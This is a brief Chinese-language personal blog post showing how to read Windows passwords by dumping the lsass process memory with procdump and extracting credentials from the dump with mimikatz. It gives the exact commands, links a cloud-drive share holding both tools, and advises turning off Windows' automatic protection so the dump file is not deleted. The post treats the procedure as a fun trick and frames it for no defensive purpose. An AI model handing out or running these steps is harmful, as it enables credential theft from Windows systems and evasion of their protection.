利用procdump+mimikatz读取windows系统中的密码

今天在学习的过程中，认识了一个工具，可以很简单的就读取windows系统的密码，觉得特别有趣，就自己亲自上手尝试了一下，果然很简单，就是因为比较笨，过程有点曲折，特此记录。

工具我也都整理好了，

链接：https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg

提取码：b1q6

procdump，可以将lsass进程的内存文件导出来；

mimikatz，可以对导出的内存文件进行分析，从而获取密码。

1，管理员权限打开cmd

procdump64.exe-accepteula -ma lsass.exe lsass.dmp

//导出为lsass.dump文件

2，管理员权限打开mimikatz.exe

执行

privilege::debug //提升权限

3，管理员权限打开cmd

把lsass.dmp放在mimikatz目录利用

mimikatz.exe"sekurlsa::minidump lsass.dmp" “sekurlsa::logonPasswordsfull” exit

最后成功读取了密码：

需要注意的是，要把windows系统的自动防护关了，不然电脑会将生成的内存文件自动删掉…